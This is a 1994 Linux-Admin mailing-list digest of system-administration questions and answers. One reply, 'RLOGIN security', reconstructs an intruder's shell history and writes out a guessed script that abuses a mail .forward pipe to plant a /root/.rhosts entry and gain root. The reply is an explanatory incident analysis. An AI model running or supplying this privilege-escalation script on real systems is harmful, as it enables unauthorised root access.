From: Digestifier To: Linux-Admin@senator-bedfellow.mit.edu Reply-To: Linux-Admin@senator-bedfellow.mit.edu Date: Fri, 7 Oct 94 00:13:48 EDT Subject: Linux-Admin Digest #153 Linux-Admin Digest #153, Volume #2 Fri, 7 Oct 94 00:13:48 EDT Contents: 16-user dial-up Linux? (Bill Stapleton) Re: Ugidd (CramDaddy) Re: Lynx under Linux (Top Dog) installing tcpip and dip help (Glen Pinkston) Re: Non-root can't start X (Randy Hootman) Re: rpc.rstatd (Polaris) Re: inetd & rpc.portmap (was Re: inetd seems to lock-up) (David La Croix) Re: utmp weirdness (Mark D. Roth) Re: Bug in Linux 'mv'? (Scott Barker) Re: RLOGIN security - more info! (Bill C. Riemers) Re: XFree86-3.1 - Whoopee! (Andrew Robert Ellsworth) Re: Telnet & ftp freeze! (Colin Beckmann) Re: PACKET SNIFFER FOR LINUX (Jim Graham) Re: gcc & g++ help (H.J. Lu) Re: Mystery Chip...AMD (G. E. Terry) mpeg_play for linux (Klevemann) ---------------------------------------------------------------------------- From: wls@magrathea.csd.uwm.edu (Bill Stapleton) Subject: 16-user dial-up Linux? Date: 5 Oct 1994 20:26:15 GMT We're planning on setting up a Pentium-90 type machine (64 meg, PCI/SCSI 2 gig) with 16 modem lines for dial-up usage. We haven't decided what hardware to connect the serial lines with though. Are people actually using any of those neat new multiport "intelligent" serial boards, especially with modem control? Anybody doing multi-user dial-up willing to share hints/warnings/experience, or bleeding edge hardware horror tales?? :-) Please E-mail and I'll post a summary. Thanks... -- Bill Stapleton wls@magrathea.csd.uwm.edu uwmcsd4!wls ------------------------------ From: cramer@catt.ncsu.edu (CramDaddy) Subject: Re: Ugidd Date: 5 Oct 1994 20:34:09 GMT ongg@athena.mit.edu (Jay Ongg) writes: >Where can i find information on how to use ugidd, or the binaries to >unfsd, and/or man pages!? > >I've looked everywhere, can't find it, not even on the man pages of >machines of other platforms. >Can someone help me out here? >Thanks! It ain't easy... it took me three days to find the ugid_map crap and another day to figure out how to put 1980 code into the current linux rpc.{mountd,nfsd} daemons. I do however have it running. The source and binaries may be found on nastromo.catt.ncsu.edu(152.1.43.57):/pub/nfs-project --cramer ========================================================================= = root@nastromo.catt.ncsu.edu NCSU Project Borg... 2nd of 7 = = jfbeam@tx.ncsu.edu NCSU College of Textiles = = jfbeam@eos.ncsu.edu NCSU College of Engineering = = jfbeam@axposf.ps.dec.com Alpha OSF/1 Development System (DEC) = = cramer@catt.ncsu.edu NCSU Computer and Technologies Theme Program = ========================================================================= = 414E Wood, NCSU, Raleigh, NC 27607 (919) 512-4653 = = 2600 Royster Rd., Shelby, NC 28150-2889 (704) 538-9060 = ========================================================================= ------------------------------ Crossposted-To: comp.infosystems.www.misc,comp.infosystems.www.providers,comp.os.linux.help,comp.os.linux.misc From: root@hal10k.com (Top Dog) Subject: Re: Lynx under Linux Date: Thu, 6 Oct 1994 10:49:46 GMT I have also noticed that Lynx is much slower in retriveing documents than Mosaic. Can anyone tell me why that is. I don't have much memory and I run X and Mosaic only when I want to view some graphics. ------------------------------ From: gpink@tyrell.net (Glen Pinkston) Subject: installing tcpip and dip help Date: Thu, 6 Oct 1994 11:17:40 GMT I am having problems with getting tcp-ip and dip to work I am using a 486DX 33 and a zyxel 1496. It will not connect correctly. It will get the carrier but will not connect. I put the same modem init string that was in minicom and it still did the same thing. Minicom works fine. tho. ------------------------------ From: rph@netcom.com (Randy Hootman) Subject: Re: Non-root can't start X Date: Mon, 3 Oct 1994 05:00:40 GMT You need an Xconfig file in your home directory. Find the utility ConfigXF86 to help you set it up. Randy : I can only start X when logged in as root. I needs some pointers on where to : look in my configuration for the problem. : Here's the message I get when trying to run openwin or startx (to start : fvwm): : linux:/hda3/danw$ openwin : XFree86 Version 2.1 / X Window System : (protocol Version 11, revision 0, vendor release 5000) : Operating System: Linux : Configured drivers: : VGA256: server for 8-bit colour SVGA (Patchlevel 0): : et4000, et3000, pvga1, wd90c00, wd90c10, wd90c30, wd90c31, gvga, ati, : tvga8800cs, tvga8900b, tvga8900c, tvga8900cl, tvga9000, clgd5420, : clgd5422, clgd5424, clgd5426, clgd5428, clgd6205, clgd6215, clgd6225, : clgd6235, clgd543x, ncr77c22, ncr77c22e, cpq_avga, oti067, oti077 : (using VT number 7) : Fatal server error: : No config file found! : Fatal server error: : Error reading config file : xinit: No such file or directory (errno 2): unexpected signal 13 : I have these in my home: : linux:/home/danw# ls -al .X* .x* : -rwxr-xr-x 1 danw root 503 Sep 24 18:42 .Xdefaults* : -rwxr-xr-x 1 danw root 438 Sep 24 18:38 .Xmodmap* : -rwxr-xr-x 1 danw root 983 Oct 1 20:22 .Xresources* : -rwxr-xr-x 1 danw root 1408 Oct 2 13:00 .xinitrc* : Any advice gratefully accepted! : Thanks, : Dan : -- : danw@panix.com : Daniel Wold 239 City Island Ave, Bronx, NY, 10464 : finger danw@danw.dialup.access.net : Sysop: WORLD CITIZEN BBS 718-885-2346 14.4 24 hrs FREE Fidonet BahaiNet -- /////////////////////////////////////////////////////////////////////// "In recognizing the humanity of our fellow beings, we pay ourselves the highest tribute." - Thurgood Marshall ////////////////////////////////////////////////////////////////////// Randy Hootman Randysoft Software (408) 229-0119 ------------------------------ From: R.G.W.Carver@dcs.warwick.ac.uk (Polaris) Subject: Re: rpc.rstatd Date: Thu, 6 Oct 1994 15:32:14 GMT petrini@di.unipi.it (Fabrizio Petrini) writes: >I tryed to install rpc.rstadt. When I run it in my rc.local I get >the following error message : >~# Cannot register service: RPC: Unable to receive; errno = Connection refused >unable to register (RSTATPROG, RSTATVERS_TIME, udp). rpc.rstatd uses the rpc system - it tries to register itself with the rpc.portmap program - you must have rpc.portmap running to use any other servers that use rpc. Richard. -- Richard Carver - polaris@dcs.warwick.ac.uk ------------------------------ From: dlacroix@guilder.bevd.blacksburg.va.us (David La Croix) Subject: Re: inetd & rpc.portmap (was Re: inetd seems to lock-up) Date: 6 Oct 1994 15:46:36 GMT Bradley M. Kuhn (bkuhn@hope.loyola.edu) wrote: : Alright. I have it TOO. I am using 1.0.9 from Slackware. Does 1.0.8 solve : the problem (or not have it, rather)? To think one version before would save : me these headaches! : I also have another problem. inetd on a machine that has drives nfs mounted : from it, inetd seems to spawn extra rpc.portmaps, one after another until the : original one is killed. is this a related problem, or something else? The fix to this is either a) compiling with the I_am_a_broken_BSD_weenie option or patching the libc to 2.5.26a or later. (the rpc.portmap bug) Also I recommend upgrading to the latest rpc.portmapper because it fixed a couple of other potential bugs (specifically security concerns) : -- : -- Bradley M. Kuhn : EMAIL: bkuhn@cs.loyola.edu, bkuhn@loyola.edu, bkuhn@rhlab.com -- dlacroix@guilder.bevd.blacksburg.va.us dlacroix@vt.edu ------------------------------ From: roth@ux4.cso.uiuc.edu (Mark D. Roth) Subject: Re: utmp weirdness Date: 3 Oct 1994 21:33:20 GMT swrek@whoa.cosmic.com (Joe Beiter) writes: >I am constantly having a problem where people are logging into the system >but then they are being removed from utmp for some reason.. ie: they >log in.. I do a "who" and see that they are logged in.. Then do a "who" >later on and they are gone from the system.. but they are actually still >logged in and even active. >This is causing various problems.. the most annoying being SIGHUP if they >happen to drop carrier or if someone wants/needs to "talk" with them. >It seem to be happening on all of our dialup systems.. we're running linux >1.1.50 and 1.1.47 with Digiboards and USR 14.4 modamns and /etc/getty. A friend of mine was having this problem with his BOCA 8port board. If I'm remembering correctly, the problem was that the utmp/wtmp file formats only have 2 characters allocated for the tty number, and he was using ttyS16 through ttyS24 for the ports. So login was trying to save "S16", a 3 character string, into a two character space, which obviously confused things. The fix was to change the names of the tty devices that correspond to the ports with the problems. (As long as the major and minor device numbers are the same, it will work. Just make sure you tell init to run getty on the new tty names.) Hope this helps. >Any help/clues/flames/comments would be appreciated. You'd even appreciate FLAMES? You *are* desperate... :) -- roth@uiuc.edu | Mark D. Roth | http://www.cen.uiuc.edu/~mr4342/ (GEEK CODE 2.1) GCS d-- H+ s++:- g+ p1>4+ !au a-- w++@ v-(*) C++>$ UL+>++++ P--- L++>+++ 3 E(-) N++ K++ W--- M-- V- po Y+ t++@ 5+ !j R-- G tv b+ D+ B--- e+(*) u+@ h>++ f+ r@ n+@ y? ------------------------------ From: scott@galileo.cuug.ab.ca (Scott Barker) Subject: Re: Bug in Linux 'mv'? Date: Thu, 6 Oct 1994 19:21:49 GMT Christopher Gori (cgori@isengard.stanford.edu) wrote: > (cdw@cci.com (Craig Woodward)) wrote: > > What about `cp -arp * /splat`? Much simpler then tar. > NO NO NO > cp doesn't copy symlinks. If you want a completely messed up file tree, go > for it, otherwise use tar from the source tree: the '-a' option of copy tells it to copy symlinks. It implies '-d' which is "no-dereference". It works just fine for me. -- Scott Barker scott@galileo.cuug.ab.ca "Philosophy: unintelligible answers to insoluble problems." - ??? ------------------------------ From: bcr@k9.via.term.none (Bill C. Riemers) Subject: Re: RLOGIN security - more info! Date: 05 Oct 1994 22:27:04 GMT Reply-To: bcr@physics.purdue.edu >>>>> "Gregory" == Gregory Trubetskoy writes: Gregory> This is regarding my earlier post about the possibilty of Gregory> making an .rhosts file in the bin directory. Gregory> This wasn't my idea - a friend of mine told me that he Gregory> can crack my linux box in three minutes. I gave him an Gregory> account and said "Go for it!". Three minutes later he Gregory> became bin. Unfortunately, I cannot find out how it was Gregory> done... Gregory> Now, here is the .bash_history file. Can someone guess Gregory> what is in the xxx file? This user did not have the write Gregory> rights to /bin (as I thought earlier) , so there is some Gregory> kind of a trick in the xxx script... Gregory> The user's name has been replaced with "username" Gregory> Any comments? Well I don't know what he did, but I think at least I can find the security hole. Lets see. username> less < /etc/inetd.conf OK, my guess is here is checking out your security. He probably noticed the a line: * stream tcp nowait bin /usr/sbin/tcpd /usr/sbin/in.* ^^^ for some command that can be used as a backdoor. So now he has a way in... username> less < /etc/hosts.deny Now he is checking to see if you explicitly blocked this hole. You probably haven't. username> finger root Hmm, here he is probably finding-out where root's home directory is. username> cd /root Yep, that is where he went to. username> ls -la Scoping out root's home directory. Hopefully he got a: ls: .: Permission denied username> cd / username> ls -la username> cd /var/tmp username> ls -la OK now it is obvious he is trying to scope out a place with the correct permissions for his plan. username> ftp OK, here is the tricky part. He could have done just about anything that can also be done from a shell. username> vi username> chmod u+x xxx username> ls -la username> ls -la username> xxx username> xxx /root/.rhosts username localhost OK it is obvious that this means 'echo localhost username > /root/.rhosts' using some security hole. My guess is it the smpt one everyone has been talking about. So the script probably looked like this: #!/bin/tcsh echo /bin/.rhosts > ~/.forward mail -r root $USER <<+ test + sleep 10 echo \"\|tail -1 \> $1\" > ~/.forward (tee /dev/tty | mail -r root $USER ) <<+ $3 $2 + rm ~/.forward If this is it, you should see the in the smail logfile that this is how the .rhosts file was created. From there, the rest is trivial. Based on the fact the .rlogin options where specified in reverse order, I'm guessing the person who cracked your system was equally clueless, but just happened to see this and a few other security holes posted on the net... Bill --
Bill C. Riemers, bcr@physics.purdue.edu
Department of Physics, Purdue University ------------------------------ From: are1@ritz.cec.wustl.edu (Andrew Robert Ellsworth) Subject: Re: XFree86-3.1 - Whoopee! Date: 6 Oct 1994 16:02:39 -0500 Carlos Dominguez wrote: >Now that it's been released.. Is there a compelling reason to upgrade? > >Will fvwm and its modules work in Xfree3.11? Unless you have a bunch of X11R6-specific programs you need to run, no. I just got the new version of the Xserver that supports my video card (W32) and was done with it. As far as fvwm, etc. working OK, I don't know. But if you don't need to run X11R6-specfic stuff, I doubt it's worth the trouble (unless you just want to be able to say "I have the latest version of Xfree86"). :) Andy Ellsworth are1@cec.wustl.edu ------------------------------ From: coling@ivory.torolab.ibm.com (Colin Beckmann) Crossposted-To: comp.os.linux.help,comp.os.linux.misc,comp.os.linux.development Subject: Re: Telnet & ftp freeze! Date: 6 Oct 1994 15:15:57 GMT Ralph Sims (ralphs@halcyon.halcyon.com) wrote: : root@jaguar.tigerden.com (System Administrator) writes: : >Trevor Lampre (trevor@xanax.apana.org.au) wrote: [stuff deleted] : >for confirming what we've been seeing! I suggest we keep this thread : >open and fill it with additional information until the problem gets the : >attention it needs. I'm not a programmer, much less a kernel hacker, so : >I can only voice frustration with the situation. : And what about those of us that DON'T see it? Basic setup is a : dedicated PPP link on a 14.4 dialup, NET-3 stuff, ppd 2.1.2a, : etc., with an InfoMagic/TransAmeritech CD-ROM combined install. : I move many megabytes of files around via FTP daily, and another : many megs around with mosaic and lynx. Sendmail+IDA's been : rock-solid. [stuff deleted] If your not seeing be thankful and provide your system configuration so the experts can see whats working and whats not working I am NOT seeing th problem, Have a 14.4 modem using NET-3 pppd 2.2.2a with slackware 1.2 , and kernel 1.1.30. I have downloaded 20 and 30 megs in a single session via ftp and never had a problem. I regularly rlogin to other sites, once again without problem Colin ------------------------------ From: jim@n5ial.mythical.com (Jim Graham) Subject: Re: PACKET SNIFFER FOR LINUX Date: Wed, 5 Oct 1994 23:07:50 GMT In article <36scpk$lr2@netnews.upenn.edu> rgollent@force.stwing.upenn.edu (Roman Gollent) writes: >Hmm, geee... I wonder why you would want a packet sniffer?? >:) I truly hope that, by adding the smiley at the end, you are telling us that you were only joking, and not to even begin to take your remarks seriously, but just in case.... (The rest of this post assumes that you really were expecting your post to be taken seriously.) Can you say ``network troubleshooting''??? I don't know for sure that this was their intent, but that is the primary use for such a tool. A Sniffer (tm?) and clones (by Sniffer, I refer to the actual product by that name) is one of the most valuable pieces of LAN test equipment currently available. I'd give anything to have one at work right now (I'm the system/network admin for a gov't contractor here in Ft. Walton) to test our ethernet. Of course, the functionality I'd be using in this case would be the TDR (that's Time Domain Reflectometer for you non-telecom folks out there---in short, it basically tells you where a cable fault is and what type of fault it is). Either way, network monitor/trace software is a very, very powerful tool. In the hands of a good guy, it can be a life-saver when it comes to network troubleshooting. In the hands of a bad guy, well, there are defenses against what they do with such tools, but yes, it can be as dangerous in their hands as it is useful in a non-criminal's hands. But then, this isn't exactly the first time a valuable tool (to the good guys) exists that is capable of being mis-used by criminals. Welcome to the wonderful world of computers and networking.... Later, --jim -- 73 DE N5IAL (/4) < Running Linux 1.0.9 > jim@n5ial.mythical.com ICBM: 30.23N 86.32W || j.graham@ieee.org Packet: --OFFLINE-- (Ft. Walton Beach, FL) E-mail me for information about KAMterm (host mode for Kantronics TNCs). ------------------------------ From: hjl@nynexst.com (H.J. Lu) Subject: Re: gcc & g++ help Date: 5 Oct 1994 23:10:04 GMT In article , s010dls@alpha.wright.edu () writes: |> I want add a path to the list of paths automatically searched for |> include files. I would also like to disable one of the warning |> messages. How do I do this? |> |> Thanks. gcc -v H.J. ------------------------------ From: gterry@gate.net (G. E. Terry) Crossposted-To: comp.sys.ibm.pc.hardware.systems,comp.os.linux.misc Subject: Re: Mystery Chip...AMD Date: 5 Oct 1994 23:19:38 GMT RYAN Colin Patrick (ryan@ecf.toronto.edu) wrote: : While responding to an add inteh local paper for a $99 486 upgrade it came : to light that this upgrade was a quote "486/66 Mhz" which was a "faster chip and less expensive than the i486DX2-66". This propted my query on what the hell : this chip was and the response was AMD. I was not aware of this chip. I was : under the impression that all the 66's 75's 100's etc (non-Pentium) were : overclocked 33 Mhz chips. Does a 'real' 66 Mhz chip exist? If so (and I dont' : think so" do traditional mother boards ( ie that could handle a DX2) support : this chip. And Finally, if this is true is it compatble and reliable. This is just an clock doubled 33. I would say it might have been an error in the ad. I have one of these chips. The story I read was that Advanced Micro Devices bought the masks for the 80286 from Intel a few years back. They decide to try to test the copywrite & patent laws by cloning the 386 & 486 chips. Well they were very successful and Intel sued. In the following trial, Intel LOST. I hear it was due to the naming system that they used. It made the chips generic in the eyes of the court. That is why there is no 80586, and we have the Pentium. As far as reliability, the AMD 486DX2/66 is an exact duplicate of Intel's chip, or so I read in PC Magazine. And at an average of 100 to 150 dollars less than Intel, I am a buyer! ------------------------------ From: klevemmc@miner.usbm.gov (Klevemann) Subject: mpeg_play for linux Date: 5 Oct 1994 23:15:34 GMT Anyone know where I can get an mpeg_play for linux ? -- ============================================================================= Matt Klevemann, Branch Of Information Services (ADP), U.S. Bureau Of Mines email: klevemmc@miner.usbm.gov voice: 412-892-6499 fax: 412-892-4205 The opinions expressed are mine, not USBM's or my wife's... "We don't know where we are going, but we are well on our way" - F.D.R. ============================================================================= ------------------------------ ** FOR YOUR REFERENCE ** The service address, to which questions about the list itself and requests to be added to or deleted from it should be directed, is: Internet: Linux-Admin-Request@NEWS-DIGESTS.MIT.EDU You can send mail to the entire list (and comp.os.linux.admin) via: Internet: Linux-Admin@NEWS-DIGESTS.MIT.EDU Linux may be obtained via one of these FTP sites: nic.funet.fi pub/OS/Linux tsx-11.mit.edu pub/linux sunsite.unc.edu pub/Linux End of Linux-Admin Digest ******************************